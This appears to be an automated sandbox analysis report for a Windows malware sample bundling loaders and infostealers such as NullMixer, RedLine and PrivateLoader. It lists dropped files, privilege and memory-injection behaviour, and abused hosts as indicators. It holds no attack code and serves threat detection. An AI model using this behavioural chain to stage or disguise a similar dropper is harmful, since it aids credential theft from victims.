Malware Analysis Report

2025-01-02 06:02

Sample ID 241123-xbw7rszqbt
Target e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe
SHA256 e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef
Tags
fabookie gcleaner nullmixer onlylogger privateloader redline socelars chrisnew aspackv2 discovery dropper execution infostealer loader spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef

Threat Level: Known bad

The file e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe was found to be: Known bad.

Malicious Activity Summary

fabookie gcleaner nullmixer onlylogger privateloader redline socelars chrisnew aspackv2 discovery dropper execution infostealer loader spyware stealer

Nullmixer family

Fabookie

Fabookie family

Socelars

RedLine payload

PrivateLoader

Redline family

Detect Fabookie payload

NullMixer

Onlylogger family

Gcleaner family

Socelars payload

Socelars family

GCleaner

OnlyLogger

RedLine

Privateloader family

OnlyLogger payload

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

ASPack v2.12-2.42

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Blocklisted process makes network request

Drops Chrome extension

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Looks up geolocation information via web service

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Browser Information Discovery

Program crash

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-23 18:41

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-23 18:41

Reported

2024-11-23 18:43

Platform

win7-20241010-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14f1396dfcf191bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14d32a38896785b13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14514904a4b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142ac5249376e895.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat144474a564d26f29.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2188 set thread context of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-3JM8J.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14febbc433.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2500 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2592 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\setup_install.exe C:\Windows\SysWOW64\cmd.exe
